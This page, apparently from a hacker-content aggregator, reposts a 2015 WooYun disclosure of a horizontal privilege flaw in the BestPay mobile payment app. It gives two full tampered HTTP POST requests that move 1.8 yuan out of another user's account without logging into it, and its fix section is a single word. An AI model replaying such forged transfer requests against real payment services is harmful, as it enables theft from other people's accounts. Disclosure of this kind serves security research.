记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

翼支付某功能设计不当(可影响他人账户资金安全)

2015-02-22 06:21

转账给其他人时,登陆的账号是用户甲,修改甲转账时候的POST包,改成如下 乙转给甲1.8元,生成交易单号

code 区域
POST /MEPF_INF2/httppost?ran31=1420620640000?ran67=1420620697000 HTTP/1.1

Host: client.bestpay.com.cn

Connection: keep-alive

Content-Length: 380

Origin: file://

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

Accept: application/json, text/javascript, */*; q=0.01

User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; zh-cn; GT-I9100G Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30

Accept-Encoding: gzip,deflate

Accept-Language: zh-CN, en-US

Accept-Charset: utf-8, iso-8859-1, utf-16, gb2312, gbk, *;q=0.7



method=predictTransfer&encrypt=&timestamp=000003&sessionkey=&v=000001&sig=&PRODUCTNO=用户乙&TRANSFERTYPE=8&SOURCEBANKCARDNO=&SOURCEACCOUNTNAME=&SOURCEIDTYPE=&SOURCEID=&DESTBANKCARDNO=&DESTACCOUNTNAME=&DESTIDTYPE=&DESTID=&DESTPRODUCTNO=用户甲&TXNAMOUNT=180%7C0&PARTNERID=000016900000&LOCATION=40&CUSTOMERNAME=&TXNPASSWD=&DESTCUSTOMERNAME=&TRANSREASON=&TXNAMOUNTFLAG=1%7C2



付款时候,依旧修改POST包,加上用户乙的支付密码,成功在不登陆用户乙的情况下,从乙账户里偷走1.8元

code 区域
POST /MEPF_INF2/httppost?ran31=1420620640000?ran67=1420620697000?ran93=1420620754000 HTTP/1.1

Host: client.bestpay.com.cn

Connection: keep-alive

Content-Length: 454

Origin: file://

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

Accept: application/json, text/javascript, */*; q=0.01

User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; zh-cn; GT-I9100G Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30

Accept-Encoding: gzip,deflate

Accept-Language: zh-CN, en-US

Accept-Charset: utf-8, iso-8859-1, utf-16, gb2312, gbk, *;q=0.7



method=transfer&encrypt=&timestamp=000004&sessionkey=&v=000001&sig=&PRODUCTNO=用户乙&TXNPASSWD=用户乙支付密码&TRANSFERTYPE=8&SOURCEBANKCARDNO=&SOURCEACCOUNTNAME=&SOURCEIDTYPE=&SOURCEID=&DESTBANKCARDNO=&DESTACCOUNTNAME=&DESTIDTYPE=&DESTID=&DESTPRODUCTNO=用户甲&TXNAMOUNT=180%7C0&PARTNERID=000016900000&PARTNERORDERID=2015010793993881&ORDERID=150107068465925&LOCATION=40&CUSTOMERNAME=&DESTCUSTOMERNAME=&TRANSREASON=%E6%97%A0&TXNAMOUNTFLAG=1%7C2

漏洞证明:

Screenshot_2015-01-07-17-03-34.png

仅测试转账,其他还有几处存在平行权限越权。

修复方案:

限制,争取干掉支付宝。能有个小礼品就更好了

知识来源: www.wooyun.org/bugs/wooyun-2015-090521

阅读:89276 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“翼支付某功能设计不当(可影响他人账户资金安全)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云